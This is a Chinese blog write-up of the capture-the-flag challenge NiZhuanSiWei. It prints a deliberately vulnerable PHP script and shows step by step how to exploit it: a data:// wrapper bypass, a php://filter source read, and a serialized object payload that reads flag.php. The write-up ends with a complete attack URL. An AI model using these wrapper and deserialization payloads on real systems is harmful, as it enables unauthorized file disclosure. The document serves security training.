BUUCTF WEB nizhuansiwei

最新推荐文章于 2023-06-17 22:03:15 发布
最新推荐文章于 2023-06-17 22:03:15 发布
阅读量174 收藏
点赞数
分类专栏: BUUCTF 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41696858/article/details/120201851
版权

代码审计题

 <?php  
$text = $_GET["text"];
$file = $_GET["file"];
$password = $_GET["password"];
if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    if(preg_match("/flag/",$file)){
        echo "Not now!";
        exit(); 
    }else{
        include($file);  //useless.php
        $password = unserialize($password);
        echo $password;
    }
}
else{
    highlight_file(__FILE__);
}
?>

三关,text file password
那么就一关关慢慢来

if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf"))

text是我们本地带过去的参数,用data伪协议就可以轻松绕过?text=data://text/plain,welcome to the zjctf
第二关,file里不能带flag,那么,其实我们要读取的是useless.php,本身也跟flag无关
直接用php://filter读取源码

file=php://filter/read=convert.base64-encode/resource=useless.php

返回了useless.php的base64编码源码
PD9waHAgIAoKY2xhc3MgRmxhZ3sgIC8vZmxhZy5waHAgIAogICAgcHVibGljICRmaWxlOyAgCiAgICBwdWJsaWMgZnVuY3Rpb24gX190b3N0cmluZygpeyAgCiAgICAgICAgaWYoaXNzZXQoJHRoaXMtPmZpbGUpKXsgIAogICAgICAgICAgICBlY2hvIGZpbGVfZ2V0X2NvbnRlbnRzKCR0aGlzLT5maWxlKTsgCiAgICAgICAgICAgIGVjaG8gIjxicj4iOwogICAgICAgIHJldHVybiAoIlUgUiBTTyBDTE9TRSAhLy8vQ09NRSBPTiBQTFoiKTsKICAgICAgICB9ICAKICAgIH0gIAp9ICAKPz4gIAo=
解码一下

<?php  

class Flag{  //flag.php  
    public $file;  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
}  
?>

第三关是一个序列化问题,要读取flag.php,toString方法被重写了,那就构造一个Flag对象,file是flag.php就好
没啥好说的,序列化吧

<?php


 
class Flag{  //flag.php  
    public $file;  
}  
$a=new Flag();
$a->file='flag.php';
echo serialize($a);
?>

结果
O:4:“Flag”:1:{s:4:“file”;s:8:“flag.php”;}
于是完整的payload

?text=data://text/plain,welcome to the zjctf&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

flag在源码里
参考视频链接:https://www.bilibili.com/video/BV1jQ4y1y76M/

显哥无敌
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF部分web题目
05-06
### BUUCTF部分Web题目分析 #### WMCTF2020 Make PHP Great Again **题目背景**: 这道题目主要是考察PHP中的`require_once()`函数的使用以及如何利用符号链接来读取文件。 **核心知识点**: 1. **`require_once()...
BUUCTFweb之强网杯2019随便注
12-14
开始注入: 1’ : 报错 1’ #:回显正常 1’ order by 1 #: 正常(经测试列数为2–此处小白暗自窃喜) 1’ union select 1,2#: 回显 如图 看来此方法是行不通了,但经过苦苦寻求,了解到了堆叠注入: ...
BUUCTF - Web - [ZJCTF 2019]NiZhuanSiWei
1tachi的博客
12-29 1670
[ZJCTF 2019]NiZhuanSiWei 源码 <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".file_get_contents($text,'
BUUCTF WEB [ZJCTF 2019]NiZhuanSiWei
Y1da的博客
04-17 202
BUUCTF WEB [ZJCTF 2019]NiZhuanSiWei 源码 index.php <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".fil
buuctf-web- [ZJCTF 2019]NiZhuanSiWei-wp
居上
07-24 245
[ZJCTF 2019]NiZhuanSiWei 知识点 data伪协议放置内容( php5.2.0后),通常用来执行php代码 file协议读取文件 构造序列化内容 过程 主页就是源代码 <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to th
buuctf [ZJCTF 2019]NiZhuanSiWei
SopRomeo的博客
03-15 1226
给了一段源码,注释如下 <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ //判断$text变量是否...
BUUCTF-NiZhuanSiWei
m0_47571887的博客
11-08 1097
打开题目 第一个if是让我们提交text值,text不为空,并且file_open_concents的返回值为'welcometothezjctf',但这text是个变量,这里就需要用到php://input协议,以POST方式提交'welcometothezjctf'。 第二个if是过滤了flag,如果检测flag,则返回"Not now",这里还发现了一个文件包含。 先将useless.php拖拽下来。 ?text=php://input&file=php://fil...
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
【变量覆盖漏洞详解】 ...这类漏洞通常出现在以下几种情况: 1. **全局变量覆盖**: ...攻击者可以通过操纵这些请求参数来覆盖预定义的变量,造成安全风险。... ...2. **extract()函数使用不当**: `extract()`函数会从数组中...
BUUCTF逆向前八题
最新发布
01-24
在本篇中,我们将探讨在BUUCTF储备赛中遇到的前八道逆向题目,通过这些题目来学习如何使用逆向工具,如exeinfo和IDA,以及如何解析汇编代码以获取关键信息。 1. Easyre: 这道题首先使用exeinfo查看文件信息,确认...
BasicASM.s(BUUCTF
06-04
分析过程文件
[BUUCTF]NiZhuanSiWei (writeup)
weixin_63306244的博客
06-17 322
2、看到了后面双斜杠提示的useless.php,说明flag在useless.php里面。3、看到了useless.php下面的unserialize猜测有反序列化。//用data://传入welcome to the zjctf。//用php://查看useless.php源码。然后现在看到代码里的public更加的确定了想法。就得到了useless.php的源码。有了这个后payload就简单了。进入后看到一串php代码。因为上面有分析到反序列化。随后就是传payload。之后就是构造序列化代码。
BUUCTF刷题记录 NiZhuanSiWei
m0_46576074的博客
05-18 414
[ZJCTF 2019]NiZhuanSiWei 进入网址 源码分析 if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")) 用data伪协议传参 ?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY= 源码分析 if(preg_match("/flag/",$file)){ echo "Not now!";
buuctf-NiZhuanSiWei
m0_62094846的博客
03-23 181
<?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".file_get_contents($text,'r')."</h1></br>.
BUUCTF_ZJCTF2019_NiZhuanSiWei
qq_45628145的博客
05-03 609
NiZhuanSiWei 进入题目,直接给出了php源码 <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ ...
buuctf-[ZJCTF 2019]NiZhuanSiWei 1(小宇特详解)
小宇的web博客
01-21 3297
buuctf-[ZJCTF 2019]NiZhuanSiWei 1(小宇特详解) 这里打开之后是一段源码 <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".
BUUCTF:[ZJCTF 2019]NiZhuanSiWei
末初的CSDN博客
11-05 1206
题目地址:https://buuoj.cn/challenges#[ZJCTF%202019]NiZhuanSiWei 老题目了 /?text=php://input&file=php://filter/read=convert.base64-encode/resource=useless.php POST内容 welcome to the zjctf useless.php <?php class Flag{ //flag.php public $file;.
BUUCTF__[ZJCTF 2019]NiZhuanSiWei_题解
风过江南乱的博客
07-06 1914
BUUCTF__[ZJCTF 2019]NiZhuanSiWei_题解 PHP伪协议 php://input data:// php://filter
BUUCTF刷题记录
qq_43579362的博客
09-13 798
1.NiZhuangSiWei 知识点: php://input,php://filter,文件包含,序列化 赛题代码: <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><
BUUCTF [ZJCTF 2019]NiZhuanSiWei特详解(php伪协议+序列化与反序列化)
m0_55854679的博客
08-23 1958
[ZJCTF 2019]NiZhuanSiWei <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".file_get_contents($te
buuctf web
08-15
回答:根据引用和引用的内容,buuctf web应该是指buuctf比赛中的一个web题目。其中可能涉及到Tornado作为非阻塞式服务器的使用,以及render函数的使用。而根据引用的内容,buuctf web题目可能存在一些漏洞,比如SSRF...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值